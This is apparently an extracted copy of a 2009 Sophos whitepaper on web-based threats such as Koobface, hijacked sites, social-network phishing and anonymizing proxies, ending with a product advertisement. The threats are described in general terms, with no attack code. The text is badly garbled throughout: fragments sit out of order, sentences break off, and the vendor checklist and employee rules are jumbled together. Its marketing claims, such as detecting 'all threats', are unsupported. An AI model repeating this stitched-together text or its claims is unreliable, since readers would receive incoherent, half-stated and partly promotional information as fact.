Professional Documents
Culture Documents
With one new infected webpage discovered every 4.5 seconds, there is no longer any such thing as a trusted website. As the internet becomes an increasingly missioncritical tool, new media such as blogs and social networking sites are a necessary part of business. This paper describes todays new web threats, highlights the need for a positive security model to replace yesterdays access-blocking approach, and describes the three pillars of protection organizations need to safeguard their systems and resources.
April 2009
records. This significant security risk can be extremely costly to businesses, with some estimates for a data breach estimated at millions, and even billions, of dollars.2 In addition to significant security and financial risks, organizations are having to deal with the legal implications of security breaches. Organizations can be legally liable if their computers are used to view pornography or hate material or to incite illegal behavior. There are also ramifications if users violate third-party licenses through illegal MP3, film and software downloads. At the same time uncontrolled web browsing can have serious productivity implications with unauthorized surfing potentially causing network slowdown, staff inefficiency and further security (and legal) risk if sensitive company or personal data is posted online.
launching pad for mass-distributing malware attacks and spam.6 In August 2008, Facebook admitted that up to 1800 users had had their profiles defaced by an attack that secretly installed a Trojan while displaying an animated graphic of a court jester blowing a raspberry.7 One particularly active threat is Koobface, a family of worms, and its rapid evolution demonstrates the wide range of social networks that are vulnerable.8 Initially targeting Facebook and MySpace, Koobface now targets a more diverse set of social networks, including MySpace, Bebo, hi5, GeoCities, Friendster and Tagged.9 The malware works by directing your friends on your socialnetworking site to click on a link to another site purporting to contain a video clip. If they are tricked into downloading an executable to watch the video at the third-party website, a message is displayed: Error installing Codec. Please Contact Support. The malware then accesses Facebook/ MySpace/etc to spread itself further.10 The websites to which victims are directed use a script to check which of these social networking sites has sent them there. The aim is to serve up malware specifically tailored to the networks of which youre known to be a member (though in fact to date these links all result in the same executable). Blogs, micro-blogs and hackers Hackers are also targeting other social media such as blogs. In much the same way that they set up malicious pages on fake websites and then use social engineering techniques to lure visitors to them, they are using free blogging services to create infected blogs. Unsuspecting victims then receive emails with links to the blog, from which malicious software is downloaded.
offer support to video bloggers, which tried to download spyware.4 at risk from a scareware attack.5
Recovery from a SQL injection attack can be difficult, and there are numerous cases of website owners cleaning up their database only to be hit again a few hours later.
At the same time, vulnerabilities in common legitimate blogging platforms just like any other platform can be, and are, exploited by criminals. Of note is the micro-blogging site, Twitter, which has begun to be targeted. In January 2009, Twitters internal systems were hacked and the accounts of Britney Spears, Fox News and Barack Obama, among others, were broken into.11 Two months later hundreds of Twitter users were hit when messages were sent from compromised accounts trying to drive traffic to a pornographic website.12
Gaming community The Valve Steam network Paypal An unusual type of phishing attack
spammed out malware within a RAR attachment.16
was targeted by a phish offering add-ons for the new zombie shooter Left 4 Dead.15
Anonymizing proxies bypass URL filtering and create enormous security vulnerabilities.
material or illegal downloads could have serious legal ramifications for an organization, as could the sharing of confidential information over the internet. their organizations web filter means they could spend all day on, for example, social networking sites rather than working, and consume valuable network bandwidth.
pillar one
Reputation-based filtering
Reputation-based filters are the first critical component in the fight against web-based threats. They prevent access to a catalog of sites that are known to have hosted malware or other unwanted content, by filtering URLs based on their reputation as good or bad, and are an established and proven tool for successfully protecting against already known and located web-based threats. As well as providing this basic form of preventive protection, they help optimize network performance and staff productivity by blocking access to illegal, inappropriate or nonbusiness-critical web content. Although traditional URL filters often connect to vast, regularly updated databases of sites known to host malware or suspicious content, they have several significant shortcomings. In particular, they offer no protection against malware hosted on legitimate, previously safe, sites that have become hijacked. Neither do they protect against malware on newly created websites. Cybercriminals are well aware of, and readily exploit, the fact that traffic from these sites is not blocked and that malware, whether new or old, will be allowed into an organization. Another significant shortcoming of traditional URL filters is that they often lack an effective solution to deal with the enormous issue of anonymizing proxies. To prevent users from bypassing filtering controls, the following two components are critical in forming a defense against anonymizing proxy use:
out new anonymizing proxies as they are published and updates the filtering database at frequent, regular intervals automatically inspects traffic for signs that its being routed through a proxy, effectively closing the door on private proxies or other proxies not identified through the reputation service.
pillar two
How frequently is your product updated to How many new threat-hosting sites are Do you scan all incoming traffic for malware Do you use your own technology for malware
scanning or rely on third-parties?
Is your malware scanning engine signaturebased or does it use behavioral analysis? malware filtering? malware filtering? catalog daily?
Is there an additional cost for real-time Is there a performance impact for real-time How many anonymizing proxies do you Does your solution identify anonymizing
proxy use in real time?
Do you scan HTTPS-encrypted traffic? Can you demonstrate real research expertise
in web threats?
Can I see a demo of the admin console to Are there on-board monitors to track How are issues reported to the
software, hardware and traffic health? administrator? Via email? Via phone call? to assure the system is available 24/7?
pillar three
Content-based filtering
Content-based filtering analyzes all web traffic on the network to determine the true filetype of content coming back from a website and can allow or disallow this traffic, based on corporate policy.
Content filters scan the actual content of a file, rather than simply looking at the file extension or the MIME-type reported by the web server, and so can identify and block files that are masquerading as innocent/allowed filetypes but really contain unauthorized content. A file might, for example, have a .TXT extension but in fact be an executable file. By enabling enforcement of only businesstype content, this pillar of protection enables organizations to create policies around a variety of content types that can be used to send malware, thereby reducing the risks of infection. For example Windows executables or screensavers might be disallowed. Content-based filtering also improves bandwidth optimization by blocking large or resource-hungry content, such as streaming video.
Users can also be encouraged or required to report unusual behavior, such as their computer suddenly becoming slow, or the homepage changing when they open their browser with no input from them, or they open a file that does nothing.
Conclusion
Every minute of every day, cybercriminals are looking to exploit web traffic for commercial gain, and since web browsing is integral to most businesses day-to-day activities, the web gateway must be equipped with a security solution that enables business and users to be productive while providing the security essential to ensure a riskfree experience. Organizations looking to protect against the growing threat of web-based malware need a solution that above all demonstrates its security attributes and combines powerful site and content controls with low-impact, effective administration. At the same time end-user expectations and requirements for speed, efficiency, and open access to the tools and sites they need must be met. Solutions which fail to meet these demands for security, control, performance, and accessibility will ultimately fail the organization.
Employees must never open spam emails Employees must never click on links included
in emails sent from unknown senders browsers are patched at all times
IT must ensure that the organizations web Employees should minimize their nonwork-related browsing for both security and productivity reasons.
Sources
1 Sophos security threat report, 2009. secure.sophos.com/sophos/docs/eng/marketing_material/sophos-security-threat-report-jan-2009-na.pdf 2 www.infowatch.com/threats?chapter=162971949&id=207784708 3 www.sophos.com/blogs/gc/g/2008/09/15/hackers-infect-businessweek-website-via-sql-injection-attack 4 www.sophos.com/pressoffice/news/articles/2008/10/adobe-infection.html 5 www.sophos.com/pressoffice/news/articles/2008/07/playstation.html 6 www.sophos.com/blogs/gc/g/2008/09/17/facebook-malware-is-a-real-threat 7 www.sophos.com/blogs/gc/g/2008/08/07/more-malicious-links-seen-on-facebook 8 www.sophos.com/security/analyses/viruses-and-spyware/w32koobfagen.html 9 www.sophos.com/security/blog/2009/02/3215.html 10www.sophos.com/blogs/gc/g/2008/08/04/facebook-and-myspace-malware 11www.sophos.com/blogs/gc/g/2009/01/07/celebrity-twitter-accounts-hacked 12www.sophos.com/blogs/gc/g/2009/03/06/chatwebcamfree-attack-hits-twitter-users 13 www.sophos.com/blogs/gc/g/2009/02/25/gmail-users-hit-viddyho-phishing-chat-attack 14www.sophos.com/blogs/gc/g/2009/03/04/istockphoto-struck-phishing-attack 15www.sophos.com/security/blog/2009/02/3426.html 16www.sophos.com/security/blog/2009/02/3287.html 17www.sophos.com/security/blog/2009/02/3071.html
Sophos solution
The Sophos Web Appliance, part of Web Security and Control, blocks spyware, viruses, phishing, malware and unwanted applications at the gateway, searching for and blocking anonymizing proxies, and enabling comprehensive web access control for safe, productive web browsing. It features an innovative, fullspectrum scanning engine that detects all threats through a unique combination of reputation-based filtering, real-time predictive threat filtering, and content-based filtering. Its easy-to-use management console and powerful reporting tools that deliver rapid insight into web traffic, threats and user behavior, enable secure browsing without the complexity of traditional web filters. As a managed appliance, the Sophos Web Appliance features remote heartbeat monitoring and on-demand remote assistance, ensuring it delivers the most dependable web security in the industry.